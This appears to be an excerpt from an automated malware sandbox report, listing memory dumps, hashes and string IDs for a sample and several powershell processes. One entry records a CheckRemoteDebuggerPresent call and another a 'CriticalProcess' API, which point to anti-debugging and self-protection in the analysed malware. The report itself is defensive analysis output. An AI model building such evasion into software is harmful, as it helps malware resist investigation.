                                                                      • Source File: 00000000.00000002.3283780131.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_kj93GnZHBS.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalProcess
                                                                      • String ID:
                                                                      • API String ID: 2695349919-0
                                                                      • Opcode ID: 02a4b84cec9e8f1df368d6a365b9b35cf3f50b5daf2219342f0f5cfbd25cdf77
                                                                      • Instruction ID: c752f0051e39c844b8fdeeeb3b79fa78b53c9f0eb4f5b670399b3459142e0f95
                                                                      • Opcode Fuzzy Hash: 02a4b84cec9e8f1df368d6a365b9b35cf3f50b5daf2219342f0f5cfbd25cdf77
                                                                      • Instruction Fuzzy Hash: 8D31E23190CA488FDB29EF9C98456E9BBE0FF55311F04012EE08AD3682DB306846CB91

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 220 7ff848e67631-7ff848e676ed CheckRemoteDebuggerPresent 224 7ff848e676ef 220->224 225 7ff848e676f5-7ff848e67738 220->225 224->225
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3283780131.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_kj93GnZHBS.jbxd
                                                                      Similarity
                                                                      • API ID: CheckDebuggerPresentRemote
                                                                      • String ID:
                                                                      • API String ID: 3662101638-0
                                                                      • Opcode ID: 69c6899b5688a32225686bcbb67366e00d0ffaedd7165f1cb942079b250c2467
                                                                      • Instruction ID: 3a5683afb67df8ecd171ff9f3f6015ae9a893cddcbb8aa79e08142f66dfb3661
                                                                      • Opcode Fuzzy Hash: 69c6899b5688a32225686bcbb67366e00d0ffaedd7165f1cb942079b250c2467
                                                                      • Instruction Fuzzy Hash: 3531023190865C8FCB58DF58888A7E97BE0FF65311F05426AD489D7282DB34A846CB91
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2120968071.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848f40000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d02e82b3d10e78ea6edddfef5aee5568ac508b515a7174977ba3cca60bb315c3
                                                                      • Instruction ID: 9c8d8e2f8fa397e74e7b69535f62efeef1ed5516d665d0b58240bc6c94efad77
                                                                      • Opcode Fuzzy Hash: d02e82b3d10e78ea6edddfef5aee5568ac508b515a7174977ba3cca60bb315c3
                                                                      • Instruction Fuzzy Hash: 15D13371D0EA8A5FF79AAB2858145B57BA0EF26B90F1800FFD04DDB0D3EA1CA805C755
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2120058960.00007FF848D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D5D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848d5d000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dd296d401885fe3fda9976f5d46a7d32a28607e430c364fd0509c2c26dc4e6d5
                                                                      • Instruction ID: 36fad9f3cbcd9401bb8ca8a0d682e30df20e100c579dd54f1eaff5b0519e3664
                                                                      • Opcode Fuzzy Hash: dd296d401885fe3fda9976f5d46a7d32a28607e430c364fd0509c2c26dc4e6d5
                                                                      • Instruction Fuzzy Hash: 2241257080EBC44FE756AB289841A527FF0EF52354F1902EFD088CB1A3D725E84AC792
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2120458734.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848e70000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1b0d58a2d1c458daccdfca3670266760a5213765476b0894bcd126b852bec002
                                                                      • Instruction ID: e84bd55ec6dc4153da4c749e6ee0533b278805868228d925bc8ee115409c68c1
                                                                      • Opcode Fuzzy Hash: 1b0d58a2d1c458daccdfca3670266760a5213765476b0894bcd126b852bec002
                                                                      • Instruction Fuzzy Hash: D931E83191CB489FDB1CEF5CA8066B97BE0FB99710F00422FE44993252DB34A856CBC2
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2120458734.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848e70000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 65df4994c32951d5f50dad95ad6e50dd1afbf181686dcf1650647bac176c5634
                                                                      • Instruction ID: 202b8a2a10eb10c8c5c87fd284e89d8d18e6c60b5428123c0ca34e4424170c15
                                                                      • Opcode Fuzzy Hash: 65df4994c32951d5f50dad95ad6e50dd1afbf181686dcf1650647bac176c5634
                                                                      • Instruction Fuzzy Hash: D721923190CA4C8FDB58DF9C984A7E97BE0EB95321F04816FD449C3152DA749456CB91
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2120458734.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848e70000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 198fbab8da828bea1e93d847ef18f3238f8f412c0dc6ddcbe1cc882b40ee83e3
                                                                      • Instruction ID: 6efe9af7355dbf9daa4b073b32e97b7218ae5b6eef12ad682bb3a49ad5dd5c79
                                                                      • Opcode Fuzzy Hash: 198fbab8da828bea1e93d847ef18f3238f8f412c0dc6ddcbe1cc882b40ee83e3
                                                                      • Instruction Fuzzy Hash: 8121D3B6C0D9864FEB09AF28A85A0F43B90FF22B85F0815B6C1584B093EF3554969B85
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2120458734.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848e70000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                      • Instruction ID: 24ef75c526cb65825109a4e7586d62867e1718cfd4eae63a3c90891dd0916743
                                                                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                      • Instruction Fuzzy Hash: CF01677111CB0D4FDB44EF0CE451AA6B7E0FB95364F50056DE58AC3691DB36E882CB45
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2120968071.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848f40000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d17d8053aaff5fbe8338b8d79cdd0c323500432d514a8c409ca4f1fd96344410
                                                                      • Instruction ID: f792091696503b3c5837913d903d6ebbde57f14096e40bc4b21711e6120e484a
                                                                      • Opcode Fuzzy Hash: d17d8053aaff5fbe8338b8d79cdd0c323500432d514a8c409ca4f1fd96344410
                                                                      • Instruction Fuzzy Hash: 63F09031A0D5058FD759EB0CE4004A473E0FFA4364B1100BBE01DD71A3CB25EC508758
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2120968071.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848f40000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 20fe35511f9e42a29a2dbba9e0e186e6189ed6a698095a14ebdf9c5b8cc13377
                                                                      • Instruction ID: 14bbc8b06583cdc9af6c6b15f6384f6dcad0b823c3a02df95b097d97b9b6c2f4
                                                                      • Opcode Fuzzy Hash: 20fe35511f9e42a29a2dbba9e0e186e6189ed6a698095a14ebdf9c5b8cc13377
                                                                      • Instruction Fuzzy Hash: DCF0BE31A0E5448FD754EB0CE4408A8B7F0FF54724B1100F7E109D70A3DB26AC608754
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2120968071.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848f40000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                      • Instruction ID: d76d88544f8f17bf3ee0e6656c2ee5cd95f71ee8ab9b11c39950933bcc316587
                                                                      • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                      • Instruction Fuzzy Hash: 94E01A31B0C8088FDA69EB0CE0409A973E1FBB8365B1101B7D14EE75A1CB22EC518B84
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2120458734.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848e70000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M_^4$M_^7$M_^F$M_^J
                                                                      • API String ID: 0-622050427
                                                                      • Opcode ID: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                                                                      • Instruction ID: 725765fdab5eb4fc6dc0b808c9c5322b07e5f4148511d7d2ba618ef3c928e049
                                                                      • Opcode Fuzzy Hash: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                                                                      • Instruction Fuzzy Hash: 0F2129F7649865AED30A7B7DF8045E93740DF942B4B8953B2E098CB083FE1470868ED4
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2259462490.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ff848f30000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a8664f322fe4be604a35a14d4f4c6d041625da21cfe97aab8452897634d7c5db
                                                                      • Instruction ID: 8eac6bb95511c5c91883ea01d4f50ebd581798bb9825add419b2fcf8e851c964
                                                                      • Opcode Fuzzy Hash: a8664f322fe4be604a35a14d4f4c6d041625da21cfe97aab8452897634d7c5db
                                                                      • Instruction Fuzzy Hash: CAD12031E1EB8A5FE79AAB2858155B57BA1EF0A390F1801FFD44DCB0D3EE1CA8058355
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2258898733.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ff848e60000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5fbffacd74fcf13b7c8db62dba418c5f6e435db9f137f8dbd38991f2536c826b
                                                                      • Instruction ID: 131545be04dfa2aaa5ea86240006948693550a17462b7b649d957c4f6c841676
                                                                      • Opcode Fuzzy Hash: 5fbffacd74fcf13b7c8db62dba418c5f6e435db9f137f8dbd38991f2536c826b
                                                                      • Instruction Fuzzy Hash: EE31E73191CB884FDB199B1C98066A97BE0FB9A720F04426FE449D3252CA71B856CBC6
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2258898733.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ff848e60000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2577e17f1dcaed21ccf335a0a87dd58c34b989ca68ab157abf18562e6ebb8882
                                                                      • Instruction ID: 3128c905baa7b1057b3535cd5cf70f47b83f3430e416bc5df250fe084d848a7b
                                                                      • Opcode Fuzzy Hash: 2577e17f1dcaed21ccf335a0a87dd58c34b989ca68ab157abf18562e6ebb8882
                                                                      • Instruction Fuzzy Hash: B621063190CB8C4FDB59DB6C9C4A7E97FE0EB96320F04416FD048C3152D674A85ACB91
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2258271922.00007FF848D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D4D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ff848d4d000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c6bf5c86fe371260e713ddf5e2dd848e53e4ab76b0274e9e0a0c862f25db7ec4
                                                                      • Instruction ID: 3088e5c30c6da24efdcd9bc614f738fc31cd4734b1c58c4923b91cdc7069019e
                                                                      • Opcode Fuzzy Hash: c6bf5c86fe371260e713ddf5e2dd848e53e4ab76b0274e9e0a0c862f25db7ec4
                                                                      • Instruction Fuzzy Hash: 01011D3260CE088F9BA4FF1EE48195277E1FB98320710069AD45EC765AD735F892CBC5
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2258898733.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ff848e60000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                      • Instruction ID: bc0586010bb7648f8a9788ff2eea40288e3a4c6b570a1a89675a5d11dfb431f3
                                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                      • Instruction Fuzzy Hash: CC01A73010CB0D4FDB44EF0CE051AA6B3E0FB85360F10052DE58AC3651DB32E882CB45
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2258898733.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ff848e60000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3cf9fa5b22e6033d2ea79a26287a68b07ca0962a2bf9554c15b25a3621b3ee37
                                                                      • Instruction ID: 37150085fdbb26318eca48690ed4db18d4dbfda9193e17521b0e68ad37c365c5
                                                                      • Opcode Fuzzy Hash: 3cf9fa5b22e6033d2ea79a26287a68b07ca0962a2bf9554c15b25a3621b3ee37
                                                                      • Instruction Fuzzy Hash: A9F0CD76948A884FDB81EF2C98691E8BFA0FFA5205B0400ABD508C7061EB31AC58CB81
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2259462490.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ff848f30000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3fd214030a326b5b7d92945ad0376cbf8f697e95a31825832fd24522d78b61c4
                                                                      • Instruction ID: 57a882c3c36b4ef86db58168bb7f768dc5b33a0debb4b92ef8783dfd518108ae
                                                                      • Opcode Fuzzy Hash: 3fd214030a326b5b7d92945ad0376cbf8f697e95a31825832fd24522d78b61c4
                                                                      • Instruction Fuzzy Hash: 0EF09A32A0D9058FD75AFB4CE4008A873E0FF64360B1100BBE01DC71A3CB26EC508798
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2259462490.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ff848f30000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1a72e4d98230ae3dce10f9ca0054cae8855afe5e91caa70ab6097ee6bf49a79b
                                                                      • Instruction ID: 65a0861757c9372eeaee605e7e7156e1c08991d50eafe922db5738b2186dd28c
                                                                      • Opcode Fuzzy Hash: 1a72e4d98230ae3dce10f9ca0054cae8855afe5e91caa70ab6097ee6bf49a79b
                                                                      • Instruction Fuzzy Hash: 07F0BE31A0D5448FD754EB4CE4408A8B7F0FF54320B1100F7E009C70A3DB26EC608754
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2259462490.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ff848f30000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                      • Instruction ID: 09613a87b3afa4a6477601c675d6bc6428512a03b2ca1351243ad063737339a8
                                                                      • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                      • Instruction Fuzzy Hash: 34E01A31B0C8088FDAAAEB4CE0409A973E1FBB8361B1101B7D14EC75A1CB22EC518B84
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2258898733.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ff848e60000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
                                                                      • API String ID: 0-2388461625
                                                                      • Opcode ID: 22011ab2f565eddac5e51ad96ee5ab1dd1b19314bdf4473b0bd33c7f4c5c7866
                                                                      • Instruction ID: 922e27a44c4728726d6be0ad97921bddf139d38f6e9c7cf8ebecfd16ebed81f9
                                                                      • Opcode Fuzzy Hash: 22011ab2f565eddac5e51ad96ee5ab1dd1b19314bdf4473b0bd33c7f4c5c7866
                                                                      • Instruction Fuzzy Hash: 212107F3A899216EC30937BCBC515E86B81EF543B874941F3E218CF113DA24648B8A96
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2444371991.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1bb07f8961e0191314b2257e178d090d1cbb9a7d9a1ad797ed1fe348dcb9610e
                                                                      • Instruction ID: b119b7ba3e2a67779c0990456d66f548bfdc426c3f0056552c15ed87df6adf69
                                                                      • Opcode Fuzzy Hash: 1bb07f8961e0191314b2257e178d090d1cbb9a7d9a1ad797ed1fe348dcb9610e
                                                                      • Instruction Fuzzy Hash: 44D13371E0EA8A5FF79AAB2858145B57BA0EF26B90F1801FBD00DDB0C3EA1C9805C755
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2439137587.00007FF848E75000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E75000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ff848e75000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 73fe222ad6d0f5bc1613d2e4930c358a13597c4f814ed157b989d4acdae749d3
                                                                      • Instruction ID: d20fc75a713f02ac538ef5c8f223dc2673b4b0afd22c331bda3f855c1d77a809
                                                                      • Opcode Fuzzy Hash: 73fe222ad6d0f5bc1613d2e4930c358a13597c4f814ed157b989d4acdae749d3
                                                                      • Instruction Fuzzy Hash: 4E510C77D0D9C68FD716BB2CA8660F43B90FF53769F0C06B6C4988B093FE2914568649
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2439137587.00007FF848E75000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E75000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ff848e75000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fa6c1f87983a57fb75d3cc8db698316f826e217a4effd56d73834e74c3bc1cf3
                                                                      • Instruction ID: dad71aca434b1a70dddd8fc8fe561e088eae397664f05f86c3c15758ec46611b
                                                                      • Opcode Fuzzy Hash: fa6c1f87983a57fb75d3cc8db698316f826e217a4effd56d73834e74c3bc1cf3
                                                                      • Instruction Fuzzy Hash: 5631F63191CA4C9FDB58EF5CA8066B97BE1FB99310F00422FE449D3251DB34A856CBC2
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2436745089.00007FF848D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D5D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ff848d5d000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 33d9975d0c7e984d7a9b6091b47cbea9a1bb017dd0c7806f5a9f04ffa246be1e
                                                                      • Instruction ID: b50c0f8d7079544932fe4e7ef2b3218c683539ab0f3e689db3e0c200ab0f6afc
                                                                      • Opcode Fuzzy Hash: 33d9975d0c7e984d7a9b6091b47cbea9a1bb017dd0c7806f5a9f04ffa246be1e
                                                                      • Instruction Fuzzy Hash: 4541397180EBC44FE756AB389845A527FF0EF56360F1505DFD088CB1A3D729A84AC7A2
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2439137587.00007FF848E75000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E75000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ff848e75000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: db769e74096e0ab309d3fdac7ce4d88cbe1aa28463355dda9525716ed8227bd2
                                                                      • Instruction ID: 638247eebe655ab3db38ee580cc3dd061e1fc6e5f863838f3f4f39029e112553
                                                                      • Opcode Fuzzy Hash: db769e74096e0ab309d3fdac7ce4d88cbe1aa28463355dda9525716ed8227bd2
                                                                      • Instruction Fuzzy Hash: F021263190CB4C8FDB59DFAC984A7E97BF0EB96320F04426FD048C3152DA74A85ACB91
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2439137587.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ff848e70000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                      • Instruction ID: 24ef75c526cb65825109a4e7586d62867e1718cfd4eae63a3c90891dd0916743
                                                                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                      • Instruction Fuzzy Hash: CF01677111CB0D4FDB44EF0CE451AA6B7E0FB95364F50056DE58AC3691DB36E882CB45
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2444371991.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ac0d39a204ad4715e8d4b9eca3037917e4b8a2d06c86b7b2adc45226235c17af
                                                                      • Instruction ID: a1d5e9032d02c25a3f017c48e054d5b535dd8df2fade6f06e9fcef471751ab15
                                                                      • Opcode Fuzzy Hash: ac0d39a204ad4715e8d4b9eca3037917e4b8a2d06c86b7b2adc45226235c17af
                                                                      • Instruction Fuzzy Hash: 53F09031A0D5458FE759EB1CE4009A477F0FFA53A4B1500B7E06DD71A3CB29EC518758
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2444371991.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0000c085c84d8f7fd8b3c12c35596ca386a6dcb2d1bcf697d75af0271f21fbb2
                                                                      • Instruction ID: 06b88d22946d397578e87a1aa7710fa22eb9a58bf0efd832684c7bf6a173fb41
                                                                      • Opcode Fuzzy Hash: 0000c085c84d8f7fd8b3c12c35596ca386a6dcb2d1bcf697d75af0271f21fbb2
                                                                      • Instruction Fuzzy Hash: 42F09A31A0D5458FEB94AB18A4409A8B7F0EF65764B1500F6E159D70A3DB2AAC608768
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2444371991.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                      • Instruction ID: d76d88544f8f17bf3ee0e6656c2ee5cd95f71ee8ab9b11c39950933bcc316587
                                                                      • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                      • Instruction Fuzzy Hash: 94E01A31B0C8088FDA69EB0CE0409A973E1FBB8365B1101B7D14EE75A1CB22EC518B84
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2439137587.00007FF848E75000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E75000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ff848e75000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M_^4$M_^7$M_^F$M_^J
                                                                      • API String ID: 0-622050427
                                                                      • Opcode ID: 19928663677d91414015beab0642f9c44214c0a004a6ac9bb81c9cbd13fb23f3
                                                                      • Instruction ID: 725765fdab5eb4fc6dc0b808c9c5322b07e5f4148511d7d2ba618ef3c928e049
                                                                      • Opcode Fuzzy Hash: 19928663677d91414015beab0642f9c44214c0a004a6ac9bb81c9cbd13fb23f3
                                                                      • Instruction Fuzzy Hash: 0F2129F7649865AED30A7B7DF8045E93740DF942B4B8953B2E098CB083FE1470868ED4
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2671786068.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff848f50000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f2a03752184ae8bc1d9165caa2de74e933d8dc6c100a80979f376408dbf9a4e8
                                                                      • Instruction ID: 80b5c4cf7f32fef0c9c46a91bcd3935e4d782276fb15729114bbce5df4ebf249
                                                                      • Opcode Fuzzy Hash: f2a03752184ae8bc1d9165caa2de74e933d8dc6c100a80979f376408dbf9a4e8
                                                                      • Instruction Fuzzy Hash: FA32F471D0DBDA4FE79AA72858151B4BFE0EF66660F0901FBD08DC71E3DA189C068366
                                                                      Memory Dump Source
